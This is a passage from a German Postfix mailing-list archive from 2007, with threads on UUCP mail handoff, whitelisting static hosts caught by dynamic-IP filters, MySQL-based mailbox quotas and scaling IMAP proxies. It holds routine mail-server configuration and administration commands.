/usr/spool/postfix readme_directory = /usr/share/doc/packages/postfix/README_FILES relay_domains = xxxxx relayhost = b-gate relocated_maps = hash:/etc/postfix/relocated sample_directory = /usr/share/doc/packages/postfix/samples sender_canonical_maps = hash:/etc/postfix/sender_canonical sendmail_path = /usr/sbin/sendmail setgid_group = maildrop smtp_sasl_auth_enable = no smtp_use_tls = no smtpd_client_restrictions = smtpd_helo_required = no smtpd_helo_restrictions = smtpd_recipient_restrictions = permit_mynetworks,reject_unauth_destination smtpd_sasl_auth_enable = no smtpd_sender_restrictions = hash:/etc/postfix/access smtpd_use_tls = no strict_8bitmime = no strict_rfc821_envelopes = no transport_maps = hash:/etc/postfix/transport regexp:/etc/postfix/transport.regexp regexp:/etc/postfix/transport.extern unknown_local_recipient_reject_code = 550 virtual_alias_domains = hash:/etc/postfix/virtual virtual_alias_maps = hash:/etc/postfix/virtual ---------------------------------------------------------- Hier mal der Output von Postconf -n: -------------------------------------------------- Gruß Daniel -- Daniel Spannbauer Systembetreuung marco Systemanalyse und Entwicklung GmbH Tel +49 8333 9233-27 Fax -11 Auf der Wies 8, D 87727 Babenhausen Mobil +49 171 4033220 http://www.marco.de/ Email ds at marco.de Geschäftsführer Martin Reuter HRB 68255 Amtsgericht München From stephan.budach at jvm.de Mon Nov 19 16:25:21 2007 From: stephan.budach at jvm.de (Stephan Budach) Date: Mon, 19 Nov 2007 16:25:21 +0100 Subject: [Postfixbuch-users] DynIPs und static IPs Message-ID: <4741AAE1.8080109@jvm.de> Moin, ich habe am Wochenende ein neues Postfix Gateway aufgesetzt und benutze u.a. auch die DynIP-Lösung von Uwe Driessen. Das Ganze funktioniert soweit sehr gut, allerdings räumen die DynIP-Checks auch eine ganze Reihe Hosts aus den Weg, die zwar in einem Dial-Up Netz liegen, aber trotzdem offenbar statische Adressen haben. Ich habe mir jetzt mit einem kleinen Perl-Skript beholfen, dass diese Adressen aus dem Log fischt und die so aufbereitet, dass ich die problemlos in eine Client-Whitelist übernehmen kann. In meiner Postconf sieht das dann so aus: smtpd_recipient_restrictions = permit_mynetworks, reject_unauth_destination, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, reject_multi_recipient_bounce, reject_invalid_helo_hostname, reject_non_fqdn_helo_hostname, check_client_access hash:/etc/postfix/rbl-whitelist, check_sender_access hash:/etc/postfix/sender_access, check_client_access pcre:/etc/postfix/maps/dynip, reject_rbl_client ix.dnsbl.manitu.net reject_rbl_client cbl.abuseat.org reject_rbl_client list.dsbl.org reject_unlisted_recipient, reject_unauth_pipelining, reject_unknown_reverse_client_hostname, check_recipient_access hash:/etc/postfix/roleaccount, check_policy_service inet:127.0.0.1:10023 Aber, ist das auch ein vernünftiger Weg? Gruss, Stephan -- Stephan Budach Jung von Matt/it-services GmbH Glashüttenstraße 79 20357 Hamburg Tel: +49 40-4321-1353 Fax: +49 40-4321-1114 E-Mail: stephan.budach at jvm.de Internet: http://www.jvm.de Geschäftsführer: Ulrich Pallas, Frank Wilhelm AG HH HRB 98380 From driessen at fblan.de Mon Nov 19 17:36:34 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 19 Nov 2007 17:36:34 +0100 Subject: [Postfixbuch-users] DynIPs und static IPs In-Reply-To: <4741AAE1.8080109@jvm.de> References: <4741AAE1.8080109@jvm.de> Message-ID: <002501c82aca$594eb570$0565a8c0@uwe> Stephan Budach schrieb: > Moin, > > ich habe am Wochenende ein neues Postfix Gateway aufgesetzt > und benutze u.a. auch die DynIP-Lösung von Uwe Driessen. Das > Ganze funktioniert soweit sehr gut, allerdings räumen die > DynIP-Checks auch eine ganze Reihe Hosts aus den Weg, die > zwar in einem Dial-Up Netz liegen, aber trotzdem offenbar > statische Adressen haben. einzige möglichkeit das dauerhaft zu unterbinden ist die Regel rauszusuchen die eben diese "falsepositiven" verursacht und dann diese deaktivieren. Auf das statisch in einem rDNS verlasse ich mich nicht mehr das haben in der zwischenzeit auch einige Dialins drin stehen und dennoch wechseln die Rechner dahinter . Hast überprüft das das auch wirklich Server dahinter sind die auch evtl. bounces annehmen? ich habe hier zur Zeit nur einen der immer mal wieder kommt aber der reagiert auch nicht auf Mails die ich an den Postmaster schicke (deswegen wird er auch nicht freigeschalten) > > Ich habe mir jetzt mit einem kleinen Perl-Skript beholfen, > dass diese Adressen aus dem Log fischt und die so > aufbereitet, dass ich die problemlos in eine Client-Whitelist > übernehmen kann. In meiner Postconf sieht das dann so aus: ich schreib die vor die eigentlichen Filter mit einem dunno als antwort direkt in die dynip, dann wird der rest der dynip nicht mehr geprüft aber alles was noch danach an Prüfungen von Postfix kommt.(selectives Greylisting, policed weight) > > smtpd_recipient_restrictions = > permit_mynetworks, > reject_unauth_destination, > reject_non_fqdn_sender, > reject_non_fqdn_recipient, > reject_unknown_sender_domain, > reject_unknown_recipient_domain, > reject_multi_recipient_bounce, > reject_invalid_helo_hostname, > reject_non_fqdn_helo_hostname, > check_client_access hash:/etc/postfix/rbl-whitelist, > check_sender_access hash:/etc/postfix/sender_access, > check_client_access pcre:/etc/postfix/maps/dynip, > reject_rbl_client ix.dnsbl.manitu.net > reject_rbl_client cbl.abuseat.org > reject_rbl_client list.dsbl.org > reject_unlisted_recipient, > reject_unauth_pipelining, > reject_unknown_reverse_client_hostname, > check_recipient_access hash:/etc/postfix/roleaccount, > check_policy_service inet:127.0.0.1:10023 > > Aber, ist das auch ein vernünftiger Weg? > > Gruss, > Stephan > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Mon Nov 19 17:55:58 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 19 Nov 2007 17:55:58 +0100 Subject: [Postfixbuch-users] Postfix und uucp In-Reply-To: <4741918B.5080800@marco.de> References: <4741918B.5080800@marco.de> Message-ID: <200711191755.58797.ml@awinkelmann.de> On Montag, 19. November 2007, Daniel Spannbauer wrote: > wir haben hier eine Sendmail-Landschaft die Mails untereinander per uucp > weiterreicht. Nun habe ich Postfix zwar soweit das es mit uucp > funktioniert, trotzdem gibts noch ein paar kleine Haken und Ösen. > > Eine davon ist die Annahme von Mails die per uucp reinkommen. > Die Steuerzeile des UUCP-FIles sieht folgendermaßen aus: > E D.b-fsN9ea7 D.b-fsN9ea7 ds -C D.b-fsN9ea7 0666 "" 0 rcsmtp -u ds TO > xxx at b-login > > Das heißt das eine Mail vom User ds an xxx at b-login gehen soll. Nur > leider interpretiert Postfix das "TO" als eigene Mailadresse und > versucht die Mail auch an TO zuzustellen. Den User gibts aber nicht. > > Weiß jemand wie ich dieses verhalten abstellen kann? Welchen Befehl benutzt Du denn um die Mails an Postfix zu übergeben? Gemeinhin dürfte das wohl eine rmail-Implementierung sein, welches sowas wie ein wrapper für (/usr/sbin/)sendmail ist. Was für ein rmail benutzt Du? Dort solltest Du wohl dann die Übergabe von dem Text-File an sendmail ändern. > alias_maps = hash:/etc/postfix/postalias.gen > regexp:/etc/postfix/alias.regexp > biff = no > canonical_maps = hash:/etc/postfix/canonical > command_directory = /usr/sbin > config_directory = /etc/postfix > daemon_directory = /usr/lib/postfix > debug_peer_level = 20 > default_transport = uucp > defer_transports = > disable_dns_lookups = no > disable_mime_output_conversion = no > home_mailbox = .mail > html_directory = /usr/share/doc/packages/postfix/html > inet_interfaces = all > inet_protocols = ipv4 > local_recipient_maps = > mail_owner = postfix > mail_spool_directory = /var/mail > mailbox_command = > mailbox_size_limit = 0 > mailbox_transport = > mailq_path = /usr/bin/mailq > manpage_directory = /usr/share/man > masquerade_classes = envelope_sender, header_sender, header_recipient > masquerade_domains = > masquerade_exceptions = root > message_size_limit = 49152000 > mydestination = $myhostname, localhost.$mydomain, $mydomain, > mydomain = marco.de > myhostname = b-login.xxxxx > mynetworks_style = subnet > myorigin = $mydomain > newaliases_path = /usr/bin/newaliases > queue_directory = /usr/spool/postfix > readme_directory = /usr/share/doc/packages/postfix/README_FILES > relay_domains = xxxxx > relayhost = b-gate > relocated_maps = hash:/etc/postfix/relocated > sample_directory = /usr/share/doc/packages/postfix/samples > sender_canonical_maps = hash:/etc/postfix/sender_canonical > sendmail_path = /usr/sbin/sendmail > setgid_group = maildrop > smtp_sasl_auth_enable = no > smtp_use_tls = no > smtpd_client_restrictions = > smtpd_helo_required = no > smtpd_helo_restrictions = > smtpd_recipient_restrictions = permit_mynetworks,reject_unauth_destination > smtpd_sasl_auth_enable = no > smtpd_sender_restrictions = hash:/etc/postfix/access > smtpd_use_tls = no > strict_8bitmime = no > strict_rfc821_envelopes = no > transport_maps = hash:/etc/postfix/transport > regexp:/etc/postfix/transport.regexp regexp:/etc/postfix/transport.extern > unknown_local_recipient_reject_code = 550 > virtual_alias_domains = hash:/etc/postfix/virtual > virtual_alias_maps = hash:/etc/postfix/virtual > ---------------------------------------------------------- > > Hier mal der Output von Postconf -n: > -------------------------------------------------- -- Andreas From stephan.budach at jvm.de Mon Nov 19 19:07:11 2007 From: stephan.budach at jvm.de (Stephan Budach) Date: Mon, 19 Nov 2007 19:07:11 +0100 Subject: [Postfixbuch-users] DynIPs und static IPs In-Reply-To: <002501c82aca$594eb570$0565a8c0@uwe> References: <4741AAE1.8080109@jvm.de> <002501c82aca$594eb570$0565a8c0@uwe> Message-ID: <4741D0CF.90705@jvm.de> Uwe Driessen wrote, On 19.11.2007 17:36 Uhr: > Stephan Budach schrieb: >> Moin, >> >> ich habe am Wochenende ein neues Postfix Gateway aufgesetzt >> und benutze u.a. auch die DynIP-Lösung von Uwe Driessen. Das >> Ganze funktioniert soweit sehr gut, allerdings räumen die >> DynIP-Checks auch eine ganze Reihe Hosts aus den Weg, die >> zwar in einem Dial-Up Netz liegen, aber trotzdem offenbar >> statische Adressen haben. > > einzige möglichkeit das dauerhaft zu unterbinden ist die Regel rauszusuchen die eben diese > "falsepositiven" verursacht und dann diese deaktivieren. > > Auf das statisch in einem rDNS verlasse ich mich nicht mehr das haben in der zwischenzeit > auch einige Dialins drin stehen und dennoch wechseln die Rechner dahinter . > Hast überprüft das das auch wirklich Server dahinter sind die auch evtl. bounces annehmen? > ich habe hier zur Zeit nur einen der immer mal wieder kommt aber der reagiert auch nicht > auf Mails die ich an den Postmaster schicke (deswegen wird er auch nicht freigeschalten) Ja, das ist bestimmt so, und mein Skript hat mir dann auch heute mal die 61 Adressen ausgeworfen, die zumindest mal irgendwo'static' im rDNS haben. Bei dem einen Server bin ich mir zumnindest mal sicher, dass es ein "echter" ist. > >> Ich habe mir jetzt mit einem kleinen Perl-Skript beholfen, >> dass diese Adressen aus dem Log fischt und die so >> aufbereitet, dass ich die problemlos in eine Client-Whitelist >> übernehmen kann. In meiner Postconf sieht das dann so aus: > > ich schreib die vor die eigentlichen Filter mit einem dunno als antwort direkt in die > dynip, dann wird der rest der dynip nicht mehr geprüft aber alles was noch danach an > Prüfungen von Postfix kommt.(selectives Greylisting, policed weight) Jaa, das hatte ich mir nämlich eigentlich auch gedacht - deswegen auch noch mal meine Nachfrage, denn ein [IP] OK in der check_client_access bedeutet ja, dass die Checks vorbei sind und somit auch der Greylisting und Amavis umgangen werden, oder? > >> smtpd_recipient_restrictions = >> permit_mynetworks, >> reject_unauth_destination, >> reject_non_fqdn_sender, >> reject_non_fqdn_recipient, >> reject_unknown_sender_domain, >> reject_unknown_recipient_domain, >> reject_multi_recipient_bounce, >> reject_invalid_helo_hostname, >> reject_non_fqdn_helo_hostname, >> check_client_access hash:/etc/postfix/rbl-whitelist, >> check_sender_access hash:/etc/postfix/sender_access, >> check_client_access pcre:/etc/postfix/maps/dynip, >> reject_rbl_client ix.dnsbl.manitu.net >> reject_rbl_client cbl.abuseat.org >> reject_rbl_client list.dsbl.org >> reject_unlisted_recipient, >> reject_unauth_pipelining, >> reject_unknown_reverse_client_hostname, >> check_recipient_access hash:/etc/postfix/roleaccount, >> check_policy_service inet:127.0.0.1:10023 >> >> Aber, ist das auch ein vernünftiger Weg? >> >> Gruss, >> Stephan >> > > > Mit freundlichen Grüßen > > Drießen > Mit freundlichem Gruß zurück, Stephan -- Stephan Budach Jung von Matt/it-services GmbH Glashüttenstraße 79 20357 Hamburg Tel: +49 40-4321-1353 Fax: +49 40-4321-1114 E-Mail: stephan.budach at jvm.de Internet: http://www.jvm.de Geschäftsführer: Ulrich Pallas, Frank Wilhelm AG HH HRB 98380 From driessen at fblan.de Mon Nov 19 19:27:16 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 19 Nov 2007 19:27:16 +0100 Subject: [Postfixbuch-users] DynIPs und static IPs In-Reply-To: <4741D0CF.90705@jvm.de> References: <4741AAE1.8080109@jvm.de> <002501c82aca$594eb570$0565a8c0@uwe> <4741D0CF.90705@jvm.de> Message-ID: <003101c82ad9$cfcf7a90$0565a8c0@uwe> Stephan Budach schrieb: > Uwe Driessen wrote, On 19.11.2007 17:36 Uhr: > > Stephan Budach schrieb: > >> Moin, > >> > >> ich habe am Wochenende ein neues Postfix Gateway aufgesetzt > >> und benutze u.a. auch die DynIP-Lösung von Uwe Driessen. Das > >> Ganze funktioniert soweit sehr gut, allerdings räumen die > >> DynIP-Checks auch eine ganze Reihe Hosts aus den Weg, die > >> zwar in einem Dial-Up Netz liegen, aber trotzdem offenbar > >> statische Adressen haben. > > > > einzige möglichkeit das dauerhaft zu unterbinden ist die > Regel rauszusuchen die eben diese > > "falsepositiven" verursacht und dann diese deaktivieren. > > > > Auf das statisch in einem rDNS verlasse ich mich nicht mehr > das haben in der zwischenzeit > > auch einige Dialins drin stehen und dennoch wechseln die > Rechner dahinter . > > Hast überprüft das das auch wirklich Server dahinter sind > die auch evtl. bounces annehmen? > > ich habe hier zur Zeit nur einen der immer mal wieder kommt > aber der reagiert auch nicht > > auf Mails die ich an den Postmaster schicke (deswegen wird > er auch nicht freigeschalten) > > Ja, das ist bestimmt so, und mein Skript hat mir dann auch > heute mal die 61 Adressen ausgeworfen, die zumindest mal > irgendwo'static' im rDNS haben. Bei dem einen Server bin ich > mir zumnindest mal sicher, dass es ein "echter" ist. dann sind es gurken Admins die nicht den RDNS ändern bei dem du sicher weist das er immer von dieser IP / rDNS kommt trag ihn am Anfang der Dynip ein und ein dunno dahinter damit genau dieser eine angenommen wird aber alle anderen eben nicht. von den restlichen schau nach ob mx / a record der @domain.xx mit der Server IP übereinstimmen wenn ausnahme wenn nicht spam? > Jaa, das hatte ich mir nämlich eigentlich auch gedacht - > deswegen auch noch mal meine Nachfrage, denn ein [IP] OK in > der check_client_access bedeutet ja, dass die Checks vorbei > sind und somit auch der Greylisting und Amavis umgangen werden, oder? > nicht ganz alle nachfolgenden checks in smtpd_recipient_restrictions werden damit umgangen Amavis sollte immer funktionieren Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From stephan.budach at jvm.de Mon Nov 19 20:54:27 2007 From: stephan.budach at jvm.de (Stephan Budach) Date: Mon, 19 Nov 2007 20:54:27 +0100 Subject: [Postfixbuch-users] DynIPs und static IPs In-Reply-To: <003101c82ad9$cfcf7a90$0565a8c0@uwe> References: <4741AAE1.8080109@jvm.de> <002501c82aca$594eb570$0565a8c0@uwe> <4741D0CF.90705@jvm.de> <003101c82ad9$cfcf7a90$0565a8c0@uwe> Message-ID: <4741E9F3.9070409@jvm.de> Uwe Driessen wrote, On 19.11.2007 19:27 Uhr: > Stephan Budach schrieb: >> Uwe Driessen wrote, On 19.11.2007 17:36 Uhr: >>> Stephan Budach schrieb: >>>> Moin, >>>> >>>> ich habe am Wochenende ein neues Postfix Gateway aufgesetzt >>>> und benutze u.a. auch die DynIP-Lösung von Uwe Driessen. Das >>>> Ganze funktioniert soweit sehr gut, allerdings räumen die >>>> DynIP-Checks auch eine ganze Reihe Hosts aus den Weg, die >>>> zwar in einem Dial-Up Netz liegen, aber trotzdem offenbar >>>> statische Adressen haben. >>> einzige möglichkeit das dauerhaft zu unterbinden ist die >> Regel rauszusuchen die eben diese >>> "falsepositiven" verursacht und dann diese deaktivieren. >>> >>> Auf das statisch in einem rDNS verlasse ich mich nicht mehr >> das haben in der zwischenzeit >>> auch einige Dialins drin stehen und dennoch wechseln die >> Rechner dahinter . >>> Hast überprüft das das auch wirklich Server dahinter sind >> die auch evtl. bounces annehmen? >>> ich habe hier zur Zeit nur einen der immer mal wieder kommt >> aber der reagiert auch nicht >>> auf Mails die ich an den Postmaster schicke (deswegen wird >> er auch nicht freigeschalten) >> >> Ja, das ist bestimmt so, und mein Skript hat mir dann auch >> heute mal die 61 Adressen ausgeworfen, die zumindest mal >> irgendwo'static' im rDNS haben. Bei dem einen Server bin ich >> mir zumnindest mal sicher, dass es ein "echter" ist. > > dann sind es gurken Admins die nicht den RDNS ändern > bei dem du sicher weist das er immer von dieser IP / rDNS kommt trag ihn am Anfang der > Dynip ein und ein dunno dahinter damit genau dieser eine angenommen wird aber alle anderen > eben nicht. Na ja, ich weiß nicht, ob die das tatsächlich auch immer können. Andererseits sollten sie dann über den Server ihres Providers relayen. > von den restlichen schau nach ob mx / a record der @domain.xx mit der Server IP > übereinstimmen wenn ausnahme wenn nicht spam? Mal sehen, ich kann natürlich auch drauf warten, bis einer der Kollegen sich beschwert, dass keine Mails mehr ankommen. ;) > >> Jaa, das hatte ich mir nämlich eigentlich auch gedacht - >> deswegen auch noch mal meine Nachfrage, denn ein [IP] OK in >> der check_client_access bedeutet ja, dass die Checks vorbei >> sind und somit auch der Greylisting und Amavis umgangen werden, oder? >> > > nicht ganz > alle nachfolgenden checks in smtpd_recipient_restrictions werden damit umgangen > Amavis sollte immer funktionieren Ah, okay. Na ja, danach kommt ja nicht mehr viel. Das ist dann ein Frage des Aufwands, würde ich sagen. Gruss, Stephan -- Stephan Budach Jung von Matt/it-services GmbH Glashüttenstraße 79 20357 Hamburg Tel: +49 40-4321-1353 Fax: +49 40-4321-1114 E-Mail: stephan.budach at jvm.de Internet: http://www.jvm.de Geschäftsführer: Ulrich Pallas, Frank Wilhelm AG HH HRB 98380 From ds at marco.de Tue Nov 20 08:00:48 2007 From: ds at marco.de (Daniel Spannbauer) Date: Tue, 20 Nov 2007 08:00:48 +0100 Subject: [Postfixbuch-users] Postfix und uucp In-Reply-To: <200711191755.58797.ml@awinkelmann.de> References: <4741918B.5080800@marco.de> <200711191755.58797.ml@awinkelmann.de> Message-ID: <47428620.1010100@marco.de> >> Eine davon ist die Annahme von Mails die per uucp reinkommen. >> Die Steuerzeile des UUCP-FIles sieht folgendermaßen aus: >> E D.b-fsN9ea7 D.b-fsN9ea7 ds -C D.b-fsN9ea7 0666 "" 0 rcsmtp -u ds TO >> xxx at b-login >> >> Das heißt das eine Mail vom User ds an xxx at b-login gehen soll. Nur >> leider interpretiert Postfix das "TO" als eigene Mailadresse und >> versucht die Mail auch an TO zuzustellen. Den User gibts aber nicht. >> >> Weiß jemand wie ich dieses verhalten abstellen kann? >> > > Welchen Befehl benutzt Du denn um die Mails an Postfix zu übergeben? Gemeinhin > dürfte das wohl eine rmail-Implementierung sein, welches sowas wie ein > wrapper für (/usr/sbin/)sendmail ist. Was für ein rmail benutzt Du? Dort > solltest Du wohl dann die Übergabe von dem Text-File an sendmail ändern. > > Naja, wenn ich das Steuerfile da oben richtig interpretiere wird rcsmtp genommen um die Mail, die per UUCP reinkommt, dem Postfix unterzuschieben. Rmail wird doch nur verwendet um die Mails, die von Postfix verschickt wurden, im anderen System aufzunehmen, oder? Aber bei rmail scheiden sich auch die Geister. Im sendmail-System war rmail nur wein Wrapper für Sendmail, dann ist noch ein rmail beim taylor-UUCP mit dabei, und dann gibts ja noch das Script auf /usr/share/doc/packages/postfix/auxilary/rmail. Welches denn nu? Unser rcsmtp sieht übrigens wie folgt aus: case "$1" in -u ) rsmtp ;; * ) gunzip | rsmtp -oMr cbsmtp ;; esac trap '' 1 runq & exit 0 Runq ist im alten System auch auf smail verlinkt. Keine Ahnung was Postfix damit anstellt. Gruß Daniel >> alias_maps = hash:/etc/postfix/postalias.gen >> regexp:/etc/postfix/alias.regexp >> biff = no >> canonical_maps = hash:/etc/postfix/canonical >> command_directory = /usr/sbin >> config_directory = /etc/postfix >> daemon_directory = /usr/lib/postfix >> debug_peer_level = 20 >> default_transport = uucp >> defer_transports = >> disable_dns_lookups = no >> disable_mime_output_conversion = no >> home_mailbox = .mail >> html_directory = /usr/share/doc/packages/postfix/html >> inet_interfaces = all >> inet_protocols = ipv4 >> local_recipient_maps = >> mail_owner = postfix >> mail_spool_directory = /var/mail >> mailbox_command = >> mailbox_size_limit = 0 >> mailbox_transport = >> mailq_path = /usr/bin/mailq >> manpage_directory = /usr/share/man >> masquerade_classes = envelope_sender, header_sender, header_recipient >> masquerade_domains = >> masquerade_exceptions = root >> message_size_limit = 49152000 >> mydestination = $myhostname, localhost.$mydomain, $mydomain, >> mydomain = marco.de >> myhostname = b-login.xxxxx >> mynetworks_style = subnet >> myorigin = $mydomain >> newaliases_path = /usr/bin/newaliases >> queue_directory = /usr/spool/postfix >> readme_directory = /usr/share/doc/packages/postfix/README_FILES >> relay_domains = xxxxx >> relayhost = b-gate >> relocated_maps = hash:/etc/postfix/relocated >> sample_directory = /usr/share/doc/packages/postfix/samples >> sender_canonical_maps = hash:/etc/postfix/sender_canonical >> sendmail_path = /usr/sbin/sendmail >> setgid_group = maildrop >> smtp_sasl_auth_enable = no >> smtp_use_tls = no >> smtpd_client_restrictions = >> smtpd_helo_required = no >> smtpd_helo_restrictions = >> smtpd_recipient_restrictions = permit_mynetworks,reject_unauth_destination >> smtpd_sasl_auth_enable = no >> smtpd_sender_restrictions = hash:/etc/postfix/access >> smtpd_use_tls = no >> strict_8bitmime = no >> strict_rfc821_envelopes = no >> transport_maps = hash:/etc/postfix/transport >> regexp:/etc/postfix/transport.regexp regexp:/etc/postfix/transport.extern >> unknown_local_recipient_reject_code = 550 >> virtual_alias_domains = hash:/etc/postfix/virtual >> virtual_alias_maps = hash:/etc/postfix/virtual >> ---------------------------------------------------------- >> >> Hier mal der Output von Postconf -n: >> -------------------------------------------------- >> > > -- Daniel Spannbauer Systembetreuung marco Systemanalyse und Entwicklung GmbH Tel +49 8333 9233-27 Fax -11 Auf der Wies 8, D 87727 Babenhausen Mobil +49 171 4033220 http://www.marco.de/ Email ds at marco.de Geschäftsführer Martin Reuter HRB 68255 Amtsgericht München From nospam at thoma.cc Tue Nov 20 12:03:25 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Tue, 20 Nov 2007 12:03:25 +0100 Subject: [Postfixbuch-users] Postfix / Courier softqouta mysql Message-ID: <4742BEFD.4060405@thoma.cc> Hallo Liste, ich wollte meine Konfiguration um Quota erweitern und habe folgende Parameter hinzugefügt: virtual_mailbox_limit_maps = proxy:mysql:/etc/postfix/mysql-v_quota.cf virtual_mailbox_limit_override = yes virtual_maildir_limit_message = Sorry, the user's maildir has overdrawn his diskspace quota, please try again later. virtual_overquota_bounce = yes Leider nimmt er dann immer noch Mails an obwohl er über dem Quota ist. Die Abfrage ist erfolgreich: mxadm at server ~$ sudo postmap -q quota at thoma.cc mysql:/etc/postfix/mysql-v_quota.cf 10240 Ich habe ein wenig im Netz rumgesucht und bin darauf gekommen das man für die Quota Funktion einen Patch installieren muss. Hat das jemand von euch schon gemacht? Ist das ein Problem bei einem laufendem System? Geht es auch irgendwie ohne den Patch? Die Hinweise die ich gefunden haben betreffen Debian Sarge. Ist im Debian Etch dieser Patch schon mit drin? Howto: http://www.howtoforge.com/virtual_postfix_mysql_quota_courier >>>> Schnipp >>>> 2 Apply Quota Patch To Postfix We have to get the Postfix sources, patch it with the quota patch, build new Postfix .deb packages and install those .deb packages: apt-get install build-essential dpkg-dev fakeroot debhelper libdb4.2-dev libgdbm-dev libldap2-dev libpcre3-dev libmysqlclient10-dev libssl-dev libsasl2-dev postgresql-dev po-debconf dpatch (1 line!) cd /usr/src apt-get source postfix wget http://web.onda.com.br/nadal/postfix/VDA/postfix-2.1.5-trash.patch.gz gunzip postfix-2.1.5-trash.patch.gz cd postfix-2.1.5 patch -p1 < ../postfix-2.1.5-trash.patch dpkg-buildpackage cd .. dpkg -i postfix_2.1.5-9_i386.deb dpkg -i postfix-mysql_2.1.5-9_i386.deb dpkg -i postfix-tls_2.1.5-9_i386.deb <<<<< Schnapp <<<<<<< Danke schon mal im voraus. Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From ml at awinkelmann.de Tue Nov 20 17:34:29 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Tue, 20 Nov 2007 17:34:29 +0100 Subject: [Postfixbuch-users] Postfix und uucp In-Reply-To: <47428620.1010100@marco.de> References: <4741918B.5080800@marco.de> <200711191755.58797.ml@awinkelmann.de> <47428620.1010100@marco.de> Message-ID: <200711201734.30691.ml@awinkelmann.de> On Dienstag, 20. November 2007, Daniel Spannbauer wrote: > >> Eine davon ist die Annahme von Mails die per uucp reinkommen. > >> Die Steuerzeile des UUCP-FIles sieht folgendermaßen aus: > >> E D.b-fsN9ea7 D.b-fsN9ea7 ds -C D.b-fsN9ea7 0666 "" 0 rcsmtp -u ds TO > >> xxx at b-login > >> > >> Das heißt das eine Mail vom User ds an xxx at b-login gehen soll. Nur > >> leider interpretiert Postfix das "TO" als eigene Mailadresse und > >> versucht die Mail auch an TO zuzustellen. Den User gibts aber nicht. > >> > >> Weiß jemand wie ich dieses verhalten abstellen kann? > > > > Welchen Befehl benutzt Du denn um die Mails an Postfix zu übergeben? > > Gemeinhin dürfte das wohl eine rmail-Implementierung sein, welches sowas > > wie ein wrapper für (/usr/sbin/)sendmail ist. Was für ein rmail benutzt > > Du? Dort solltest Du wohl dann die Übergabe von dem Text-File an sendmail > > ändern. > > Naja, wenn ich das Steuerfile da oben richtig interpretiere wird rcsmtp > genommen um die Mail, die per UUCP reinkommt, > dem Postfix unterzuschieben. Rmail wird doch nur verwendet um die Mails, > die von Postfix verschickt wurden, im anderen System aufzunehmen, oder? > > Aber bei rmail scheiden sich auch die Geister. Im sendmail-System war > rmail nur wein Wrapper für Sendmail, dann ist noch ein rmail beim > taylor-UUCP mit dabei, und dann gibts ja noch das Script auf > /usr/share/doc/packages/postfix/auxilary/rmail. Welches denn nu? uucp kopiert eine Datei von einem Rechner auf einen anderen. Beim Thema Mail gibt es wohl zwei Wege um Mails auf dem Ziel-System an den MTA zu übergeben. Einmal rmail und zum anderen rsmtp. rmail ist ein Wrapper zwischen einer normalen rfc822 Mail die an das /usr/sbin/sendmail übergeben wird, sendmail holt sich dann die Empfänger aus der Mail. rsmtp ist ein Wrapper, der die Empfänger im SMTP-Dialog an den MTA übergibt. Eine mögliche rmail-Implementierung ist beispielweise im Postfix-Paket. Zu rsmtp wüsste ich nichts. Evtl. könnte man mit einem Script die SMTP-Daten (Sender/Empfänger) extrahieren und mit netcat an einen smtpd übergeben. Vielleicht gibt es aber auch irgendwelche Pakete für Deine Distribution mit möglichen Implementierungen. Habe jetzt spontan nichts eigenständiges gefunden. Schau doch einfach mal ob Du auf rmail umstellen kannst. > Unser rcsmtp sieht übrigens wie folgt aus: > > case "$1" in > -u ) rsmtp ;; > * ) gunzip | rsmtp -oMr cbsmtp ;; > esac > trap '' 1 > runq & > exit 0 > > Runq ist im alten System auch auf smail verlinkt. Keine Ahnung was > Postfix damit anstellt. runq könnte ein äuquivalent zu "postqueue -f" sein. -- Andreas From lists at puersten.de Tue Nov 20 17:56:09 2007 From: lists at puersten.de (=?ISO-8859-15?Q?Oliver_P=FCrsten?=) Date: Tue, 20 Nov 2007 17:56:09 +0100 Subject: [Postfixbuch-users] 50.000 - 80.000 IMAP-Connections Message-ID: <474311A9.5020600@puersten.de> >Wir haben derzeit einen Mail-Cluster zu bauen, der später >schätzungsweise rund 150.000 POP3-User und rund 150.000 IMAP-Nutzer >auhalten muß. Die POP3-Nutzer sind kein Problem, denn die sind nur >wenige Minuten zum Mailabruf im System, die IMAP-Nutzer hingegen halten >über Stunden hinweg permanent ihre Verbindung offen. Und das klaut mir >meinen Ram. > >Wir müssen also ein System bauen, daß schätzungsweise 50.000 - 80.000 >simultante IMAP-Sitzungen abkann. > >Problem: Ein Courier-IMAP verbrät einen runden MByte pro Sitzung. Wenig, >aber das bedeutet, daß ein 8 GByte-Server nur ca. 6.000 Sitzungen >abkann, auch wenn in 5.900 Sitzungen über lange Zeit exakt *nichts* >passiert. > >Um das ganze besser skalieren zu können würde ich die Last pro Blade >gerne deutlich steigern können, 6.000 Sitzungen sind mir zu wenig. > >Zwar gibt es diverse IMAP-Proxy-Server, die an verschiedene IMAP-Server >weiterleiten, doch bringen die mir nichts, weil auch diese die ganze >Zeit die Verbindung offen halten. > >Ich suche deshalb einen IMAP-Proxy-Server mit sehr kleinem memory >footprint, der vorzugsweise die Verbindung zum IMAP-Server nur bei >Aktivitäten des Clients aufbaut und ansonsten die Verbindung kappt und >die Resourcen freigibt. > >Kennt hier jemand so ein Teil? Ich bin da bislang leider noch nicht >fündig geworden. > >Liebe Grüße > >Peer Heinlein > >-- >Heinlein Professional Linux Support GmbH >Akademie: Linux - Support - Hosting > >http://www.heinlein-support.de Hi Peer, ich bin bei meiner Suche nach der Lösung für ein ähnliches Problem auf diese interessante Unterhaltung gestoßen. Jetzt wollte ich mal fragen ob Du oder jemand anders hier schon eine Lösung gefunden hat? Sprich einen IMAP Proxy welchen man vorschalten 